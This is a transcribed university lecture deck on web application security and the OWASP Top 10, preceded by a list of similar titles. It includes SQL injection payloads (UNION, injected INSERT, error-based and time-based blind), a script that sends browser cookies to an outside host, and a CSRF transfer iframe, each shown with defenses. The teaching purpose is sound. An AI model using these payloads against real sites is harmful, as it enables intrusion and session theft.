Information Security. Gabriel Lawrence Director, IT Security UCSD

Similar documents
Application Layer Security

OWASP Top 10 The Ten Most Critical Web Application Security Risks

C1: Define Security Requirements

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Copyright

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Web Application Security. Philippe Bogaerts

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Your Turn to Hack the OWASP Top 10!

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Welcome to the OWASP TOP 10

Sichere Software vom Java-Entwickler

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Web Application Vulnerabilities: OWASP Top 10 Revisited

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Mobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing


CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Advanced Web Technology 10) XSS, CSRF and SQL Injection

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Solutions Business Manager Web Application Security Assessment

F5 Big-IP Application Security Manager v11

P2_L12 Web Security Page 1

OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Some Facts Web 2.0/Ajax Security

Web Application Security

Aguascalientes Local Chapter. Kickoff

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Applications Security

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection


Development*Process*for*Secure* So2ware

1 About Web Security. What is application security? So what can happen? see [?]

Security Best Practices. For DNN Websites

Securing Your Web Application against security vulnerabilities. Alvin Wong, Brand Manager IBM Rational Software

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

GOING WHERE NO WAFS HAVE GONE BEFORE

WEB APPLICATION SCANNERS. Evaluating Past the Base Case

Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

CSCD 303 Essential Computer Security Fall 2017

CS 161 Computer Security

Secure Coding, some simple steps help. OWASP EU Tour 2013

Top 10 Web Application Vulnerabilities

TIBCO Cloud Integration Security Overview

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

Students should have an understanding and a working knowledge in the following topics, or attend these courses as a pre-requisite:

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

F5 Application Security. Radovan Gibala Field Systems Engineer

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 3 Protecting Systems

WEB SECURITY: XSS & CSRF

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

HTTP Security Headers Explained

CLOUD COMPUTING SECURITY THE SOFT SPOT Security by Application Development Quality Assurance

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

NET 311 INFORMATION SECURITY

10 FOCUS AREAS FOR BREACH PREVENTION

Client Side Injection on Web Applications

RKN 2015 Application Layer Short Summary

Web Application Penetration Testing

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Evaluating the Security Risks of Static vs. Dynamic Websites

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?

Tabular Presentation of the Application Software Extended Package for Web Browsers

Exploiting and Defending: Common Web Application Vulnerabilities

Ruby on Rails Secure Coding Recommendations

EasyCrypt passes an independent security audit

Students should have an understanding and a working knowledge in the following topics, or attend these courses as a pre-requisite:

CSCD 303 Essential Computer Security Fall 2018

Defend Your Web Applications Against the OWASP Top 10 Security Risks. Speaker Name, Job Title

Managed Application Security trends and best practices in application security

OWASP Top David Caissy OWASP Los Angeles Chapter July 2017

Information Security CS 526 Topic 8

last time: command injection

En partenariat avec CA Technologies. Genève, Hôtel Warwick,

CSWAE Certified Secure Web Application Engineer

Certified Secure Web Application Engineer

Slides adopted from Laurie Williams. OWASP Top Ten. John Slankas

Combating Common Web App Authentication Threats

Security issues. Unit 27 Web Server Scripting Extended Diploma in ICT 2016 Lecture: Phil Smith

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

Web Application Threats and Remediation. Terry Labach, IST Security Team

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

CIS 4360 Secure Computer Systems XSS

LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security

Transcription:

Information Security Gabriel Lawrence Director, IT Security UCSD

Director of IT Security, UCSD Three Startups (2 still around!) Sun Microsystems (Consulting and JavaSoftware) Secure Internet Applications

Don t go to jail! Some of the things i m going to talk about are ok against your applications... but would be bad against someone else s.

Internet Security is new... no really. ARPANET first two nodes in 1969, modern infosec didnt roll around until 1988

First Major Worm Morris Worm, 1988 Web Server Worm Code Red, 2001 Web App Worm Asprox, May 2008 Network security- 1988-2008 Web Security (browser and web apps) 2008- Asprox attacked any web app using sql injection.

Protecting assets from risk using people, process and technology What is information security? why do we care?

SDLC Requirements Architecture/Design Coding Integration Testing Deployment Long Term Support Agile development has smaller cycles... but generally software dev follows these major phases Requirements- what you are going to build Architecture/Design - How Coding - Doing it Integration Testing - Making sure the overall build works Deployment - Shipping it Long Term support - You can never really be done!

Where was security again? I know... this guy is supposed to be a security guy and he didnt show it in the SDLC slide... Whats up with that?

Security is part of every step in the SDLC

Requirements concretely define security expectations Data Definition Handling Storage Auth^2 Logging Threat modeling may be a tool to use here depending on how sensitive the application is, how large the development team is, or how formal the methodology is. Could straddle Requirements and Architecture/Design effort. http://www.owasp.org/index.php/threat_risk_modeling 1. Identify Security Objectives Auth^2, How much risk will you take? Reputation? Privacy and Regulatory compliance? Availability? 2. Analyze requirements/app design for components, data flows, trust boundaries 3. Decompose the app to features and modules and identify the ones where security matters 4. Identify threats 5. Decide what you do about them - Different mechanisms to accomplish this...

Architecture/Design should identify security characteristics and critical security features Examples: Userid for database access... normal userid, sensitive userid Identify trusted communication paths and trust boundaries Identify how auth^2 is accomplished and where - universal enforcement

Use secure coding practices Security and Quality are often the same How does your software deal with expected and unexpected inputs? Unit tests should test good and BAD inputs. Threat models? CODE REVIEWS!

Integration Testing is a good point to test the big picture Quality - does it do what its supposed to? does it do other things? Automated tools - Application scanners Hand Testing - Be Evil

Deployment Traditional InfoSec Security around the database userids? N-tier? 1 tier? Firewalls? OS hardening? Log management? Patch Management? Fault Tolerance? Configurations? Vulnerability scanning?

Don t forget about your application Component updates? New threats? New attacks? Biggest risk here!

What does it mean to be evil? Developers and traditional IT tends to think about Does the feature work? Is the system up? Does it do what the user wants? Attackers come at it from a different direction. What happens when i give it bad input? How does it fail? what can i do when its failing? What else can I make this system do? Abusing trust

OWASP and the Top 10 Open Web Application Security Project - owasp.org Top 10 - top 10 risks not top 10 weaknesses

A1 - Injection SQL, OS/Command, LDAP Untrusted data sent to an interpreter as part of a command/query interpreter gets confused about whats data and code and executes some hostile data

... String[] pwordarr = request.getparametervalues ("pword"); if(unamearr.length == 1 && pwordarr.length == 1){ res = stm.executequery("select * FROM users WHERE username = '"+unamearr[0]+"'"); }...

Used to select data from a table Syntax SELECT [ALL DISTINCT] columnname1 [,columnname2] FROM tablename1 [,tablename2] [WHERE condition] [ and or condition...] [GROUP BY column-list] [HAVING "conditions ] [ORDER BY "column-list" [ASC DESC] ]

Select uname,password from users select uname,password from users where uname='gabe' SQL comments, stuff the database ignores select uname,password from users where uname='gabe' -- this is a comment...

"SELECT * FROM users WHERE username = '"+unamearr[0]+"'"

unamearr[0] = gabe Select * from users where username= gabe

unamearr[0] = Select * from users where username= Exception!

Puts the results of two selects together SELECT [ALL DISTINCT] columnname1 [,columnname2] FROM tablename1 [,tablename2] [WHERE condition] [ and or condition...] UNION SELECT [ALL DISTINCT] columnname1 [,columnname2] FROM tablename1 [,tablename2] [WHERE condition] [ and or condition...]

unamearr[0] = union select gabe, pass -- ; Select * from users where username= union select gabe, pass --

;insert into users (username,password) values ('badguy','pass');

Error Based SQL Injection unamearr[0] = union select cast(version () as int), pass -- ERROR: invalid input syntax for integer: "PostgreSQL 8.3.7 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.3-5ubuntu4) 4.3.3" You can get an actual error message back So... make uselful information appear in the error message NOISY EASY

Blind SQL Injection unamearr[0] = ;select pg_sleep(10) where exists (select table_name from information_schema.tables where substr (table_name,1,1)='p')-- Error is handled by the app, but the SQL is still run Ask a series of Yes/No questions is there a table that has a name beginning with A? is there a table that has a name beginning with B? Long and painful... so write a program :-)

http://sqlmap.sourceforge.net/ http://michaeldaw.org/sql-injection-cheatsheet http://sla.ckers.org/forum/

Parameterized queries Stored procedules/eval! Escape special characters (OWASP ESAPI)

A2 - Cross Site Scripting (XSS) App takes untrusted data and sends it to the browser * User data entered into a form * Data injected into database (see asprox) * Data from external feed Allows attacker to modify web pages, steal data and redirect web browser.

JavaScript First deployed in the browse in December of 1995 Now known as ECMAScript prototype-based scripting language Loosely based on C (the Java in JavaScript is marketing although there is a link between Java and JavaScript they are separate ( languages

JavaScript in the browser Most commonly used in web browsers for client side scripting Also in PDF, Adobe Creative Suite, JDK 1.6, Dashboard Widgets on OSX, Adobe Air Browsers come with standard Objects browser objects: window, document, HTML event handlers Document Object Model XMLHttpRequest

Document Object Model Standard object model for HTML and XML documents Support in all browsers Allows JavaScript to read and change the contents of web pages Defines an event model that allows JavaScript to interact with the user

Communicating across the network JavaScript can load images JavaScript can submit forms iframes XmlHttpRequest Other methods...

JavaScript Security Model Browser has a security policy that governs what JavaScript can do The Same-Origin Policy prevents scripts loaded from one web site from interacting with a document loaded from a different site Scripts loaded from other sites are restricted to the origin that the document that loaded them came from, not the place the script was hosted Same origin applies to accessing embedded documents ( ilayer (Window, iframe, layer, Same origin doesn t prevent script from loading window, iframe, layer, ilayer from another site

Poor Mans Page Defacement document.location on browsers controls the what content is in the current window What would happen if we put <script>document.location="http:// www.cnn.com"</script> in a field that gets stored and shown to users of the site?

Stealing data <script> var myimage = new Image; myimage.src="http:// www.landq.org/"+document.cookie +"---"+document.location; </script>

CSS Javascript HTML JSON Output filtering Different filtering for output destination

But I want HTML formatting! Use wiki markup Getting standard Use HTML entities for odd characters Whitelist Define what tags are allowed Define what attributes are allowed Strip everything else Your code produces the markup, so you are in control

A3 - Broken Authentication and Session Management Jump past the login page No security around assets - images and video streams (performance or because 3rd party package...) Data in session cookies Username? what happens if i change it? Application timeouts... user walks away Does not use SSL/TLS for all traffic - just login? session cookie is stealable. Session ID in urls. Emailed to others... pwned. Watch out for XSS!

Parameter tampering A4 - Insecure Direct Object References http://www.example.com/view.jsp? itemid=10

A5 - Cross Site Request Forgery <iframe src= http://yourbank/transfer.asp? from=checking&to=08809988&amount=10 00000></iframe> Use a random hidden value, or nonce, javascript security model will protect you so that there is a secret parameter that cant be predicted or known by the malicious folks.

A6 - Security Misconfiguration Did you get the deployment step right? Remove all testing code?

A7 - Failure To Restrict URL access Comcast example Auth^2 properly applied? Policies need to be flexible to adapt to business needs. Role based, so you dont have to twiddle every user. Proper business situation for access Default deny!

A8 - Unvalidated Redirects and Forwards user parameters in url includes redirects look like your site, but send you to evil.com

A9 - Insecure Cryptographic Storage Right cryptographic alg? Key management? Data at rest? Using a valid cert (sorta a config issue...)

A10 - Insufficient Transport Layer Protection Session cookies have secure flag set Legit server cert Require SSL... Dont let em land on the non ssl site. Backend communication???

Error Page Handling Set up a global error handler Control the information leaked out Ability to do additional logging and notification Done globally assures that it is applied consistently Not enough to protect from problems

Check out owasp.org

Questions?

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback